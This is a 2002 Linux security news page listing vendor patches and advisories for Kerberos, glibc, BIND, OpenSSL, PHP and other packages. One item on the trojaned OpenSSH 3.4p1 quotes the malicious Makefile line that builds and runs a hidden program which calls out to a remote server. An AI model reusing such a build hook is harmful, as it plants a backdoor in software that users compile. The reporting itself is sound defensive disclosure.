Linux Compatible - Security (Page 1)

New Security Updates for Red Hat & Debian

Security 10929 Published 2002-08-21 06:54 by Philipp Esselbach 0

The follow new security updates are available:

Red Hat Linux
- New PHP packages fix vulnerability in safemode
- Updated krb5 packages fix remote buffer overflow

Debian GNU/Linux
- http://www.debian.org/security/2002/dsa-154

Updated krb5 package for Red Hat Linux

Security 10929 Published 2002-08-15 17:52 by Philipp Esselbach 0

Red Hat has released an updated krb5 package which fix a remote buffer overflow:

"The Kerberos 5 network authentication system contains an RPC library which includes an XDR decoder derived from Sun's RPC implementation. The Sun implementation was recently demonstrated to be vulnerable to a heap overflow. It is believed that the attacker needs to be able to authenticate to the kadmin daemon for this attack to be successful. No exploits are known to currently exist."

Download

New Security Updates for Mandrake & Debian

Security 10929 Published 2002-08-15 02:00 by Philipp Esselbach 0

New security patches are available for Mandrake Linux and Debian GNU/Linux.

Mandrake Linux:
- MDKSA-2002:038-1 - bind
- MDKSA-2002:049 - libpng
- MDKSA-2002:050 - glibc
- MDKSA-2002:051 - xchat
- MDKSA-2002:052 - sharutils

Debian GNU/Linux:
- DSA-150 interchange - illegal file exposition
- DSA-151 xinetd - pipe exposure
- DSA-152 l2tpd - missing random seed
- DSA-153 mantis - cross site code execution

glibc Security Update for Debian

Security 10929 Published 2002-08-13 10:37 by Philipp Esselbach 0

A glibc update for Debian GNU/Linux has been released:

"An integer overflow bug has been discovered in the RPC library used by GNU libc, which is derived from the SunRPC library. This bug could be exploited to gain unauthorized root access to software linking to this code. The packages below also fix integer overflows in the malloc code. They also contain a fix from Andreas Schwab to reduce linebuflen in parallel to bumping up the buffer pointer in the NSS DNS code.

This problem has been fixed in version 2.1.3-23 for the old stable distribution (potato), in version 2.2.5-11.1 for the current stable distribution (woody) and in version 2.2.5-13 for the unstable distribution (sid).

We recommend that you upgrade your libc6 packages immediately."

Read more

Security Updates for Red Hat & SuSE

Security 10929 Published 2002-08-13 01:39 by Philipp Esselbach 0

New security updates are available for Red Hat Linux and SuSE Linux.

Red Hat Linux:
- Updated glibc packages fix vulnerabilities in RPC XDR decoder
- Updated Tcl/Tk packages fix local vulnerability

SuSE Linux:
- i4l: local privilege escalation

Hylafax Security Fix for Debian

Security 10929 Published 2002-08-12 09:58 by Philipp Esselbach 0

Buffer overflows and format string vulnerabilities has been found in Hylafax

Read more

Updated bind packages for Red Hat

Security 10929 Published 2002-08-11 02:57 by Philipp Esselbach 0

Red Hat Inc. has released a security update for the bind packages in Red Hat Linux:

ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and various tools.

A buffer overflow vulnerability exists in multiple implementations of DNS resolver libraries. Applications that utilize vulnerable DNS resolver
libraries may be affected. A remote attacker who is able to send malicious DNS responses could potentially exploit this vulnerability to execute arbitrary code or cause a denial of service on a vulnerable system.

Read more

New Security Updates

Security 10929 Published 2002-08-09 07:12 by Philipp Esselbach 0

The follow new security patches are available:

Mandrake Linux:
- MDKSA-2002:047 : util-linux
- MDKSA-2002:048 : mod_ssl

Debian GNU/Linux:
- DSA-147-1 mailman -- cross-site scripting

Sun Cobalt RaQ4:
- Security Hardening Update 2.0.1

Security Updates for Debian & Mandrake

Security 10929 Published 2002-08-08 04:40 by Philipp Esselbach 0

New security patches for Debian GNU/Linux and Mandrake Linux are available.

Debian GNU/Linux:
- DSA-145-1 tinyproxy -- doubly freed memory
- DSA-146-1 dietlibc -- integer overflow

Mandrake Linux:
- MDKSA-2002:046-1 : openssl

Security Updates for Red Hat & Debian

Security 10929 Published 2002-08-06 03:20 by Philipp Esselbach 0

New security patches are available for Red Hat Linux and Debian GNU/Linux.

Red Hat Linux:
- Updated openssl packages fix protocol parsing bugs
- Updated gaim client fixes Jabber plug-in vulnerability

Debian GNU/Linux:
- libpng -- buffer overflow
- openafs -- integer overflow
- krb5 -- integer overflow
- wwwoffle -- improper input handling

Trojan found in OpenSSH 3.4p1

Security 10929 Published 2002-08-01 09:59 by Philipp Esselbach 0

It seems like that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks Palos.

"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net)."

Read more

OpenSSH 3.4p1-PM4 for Cobalt RaQ 3/4

Security 10929 Published 2002-07-31 12:43 by Philipp Esselbach 0

PkgMaster has released a new OpenSSH package for Cobalt RaQ 3/4 and CacheRaQ4:

- OpenSSH enables you to connect securely (encrypted) to your Sun Cobalt appliance
- Contains both Client and Server software
- Statically compiled agains zlib 1.1.4 and openssl 0.9.6e
- PrivSep enabled for better security
- Compression enabled for better performance

Download

OpenSSL Remote Vulnerabilities

Security 10929 Published 2002-07-31 02:46 by Philipp Esselbach 0

A remotely exploitable buffer overflow has been found in OpenSSL

OpenSSL is a commercial-grade, full-featured, and Open Source toolkit which implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux
SuSE

mm Library Security Patch

Security 10929 Published 2002-07-30 02:34 by Philipp Esselbach 0

Marcus Meissner and Sebastian Krahmer discovered a temporary file vulnerability in the mm library which is used by the Apache webserver. This vulnerability can be exploited to obtain root privilege if shell access to the apache user (typically apache or nobody) is already obtained.

Updates are available for:
Red Hat Linux
Mandrake Linux
Debian GNU/Linux

OpenSSH 3.4p1-PM4 for Cobalt RaQ 1/2

Security 10929 Published 2002-07-29 14:47 by Philipp Esselbach 0

PkgMaster has released an OpenSSH 3.4p1-4 update for the MIPS based Cobalt RaQ 1/2 server appliances.

This release fix a major security vulnerability:

''At least one major security vulnerability exists in many deployed OpenSSH versions (2.3.1 to 3.3).

The 3.4 release contains many other fixes done over a week long audit started when this issue came to light. We believe that some of those fixes are likely to be important security fixes. Therefore, we urge an upgrade to 3.4.''

Download

Vulnerability in PHP versions 4.2.0 and 4.2.1

Security 10929 Published 2002-07-27 12:02 by Philipp Esselbach 0

The PHP Group has released PHP version 4.2.2 which fix a serious vulnerability in PHP versions 4.2.0 and 4.2.1